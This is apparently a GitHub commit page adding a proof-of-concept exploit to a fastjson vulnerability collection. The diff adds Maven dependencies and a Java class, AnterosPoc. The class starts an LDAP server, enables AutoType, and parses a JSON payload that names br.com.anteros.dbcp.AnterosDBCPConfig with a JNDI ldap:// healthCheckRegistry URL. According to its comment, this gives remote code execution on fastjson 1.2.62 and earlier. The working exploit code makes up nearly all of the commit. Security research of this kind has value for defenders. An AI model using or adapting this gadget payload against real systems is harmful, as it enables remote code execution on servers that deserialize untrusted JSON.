Skip to content

Commit bbdb3e2

Browse files
author
threedr3am
committed
feat:fastjson新gadget(anteros-dbcp)
1 parent a5839c5 commit bbdb3e2

File tree

2 files changed

+66
-0
lines changed

2 files changed

+66
-0
lines changed

fastjson/pom.xml

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -49,5 +49,24 @@
4949
<artifactId>xbean-reflect</artifactId>
5050
<version>4.15</version>
5151
</dependency>
52+
53+
<!-- https://mvnrepository.com/artifact/com.codahale.metrics/metrics-healthchecks -->
54+
<dependency>
55+
<groupId>com.codahale.metrics</groupId>
56+
<artifactId>metrics-healthchecks</artifactId>
57+
<version>3.0.2</version>
58+
</dependency>
59+
<!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-Core -->
60+
<dependency>
61+
<groupId>br.com.anteros</groupId>
62+
<artifactId>Anteros-Core</artifactId>
63+
<version>1.2.1</version>
64+
</dependency>
65+
<!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-DBCP -->
66+
<dependency>
67+
<groupId>br.com.anteros</groupId>
68+
<artifactId>Anteros-DBCP</artifactId>
69+
<version>1.0.1</version>
70+
</dependency>
5271
</dependencies>
5372
</project>

fastjson/src/main/java/com/threedr3am/bug/fastjson/AnterosPoc.java

Lines changed: 47 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,47 @@
1+
package com.threedr3am.bug.fastjson;
2+
3+
import com.alibaba.fastjson.JSON;
4+
import com.alibaba.fastjson.parser.ParserConfig;
5+
import com.threedr3am.bug.common.server.LdapServer;
6+
7+
/**
8+
* fastjson <= 1.2.62 RCE,需要开启AutoType
9+
*
10+
* Anteros-DBCP依赖的gadget
11+
*
12+
* <dependency>
13+
* <groupId>com.codahale.metrics</groupId>
14+
* <artifactId>metrics-healthchecks</artifactId>
15+
* <version>3.0.2</version>
16+
* </dependency>
17+
*
18+
* <dependency>
19+
* <groupId>br.com.anteros</groupId>
20+
* <artifactId>Anteros-Core</artifactId>
21+
* <version>1.2.1</version>
22+
* </dependency>
23+
*
24+
* <dependency>
25+
* <groupId>br.com.anteros</groupId>
26+
* <artifactId>Anteros-DBCP</artifactId>
27+
* <version>1.0.1</version>
28+
* </dependency>
29+
*
30+
* @author threedr3am
31+
*/
32+
public class AnterosPoc {
33+
static {
34+
//rmi server示例
35+
// RmiServer.run();
36+
37+
//ldap server示例
38+
LdapServer.run();
39+
}
40+
41+
public static void main(String[] args) {
42+
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
43+
44+
String payload = "{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";//ldap方式
45+
JSON.parse(payload);
46+
}
47+
}

0 commit comments

Comments
 (0)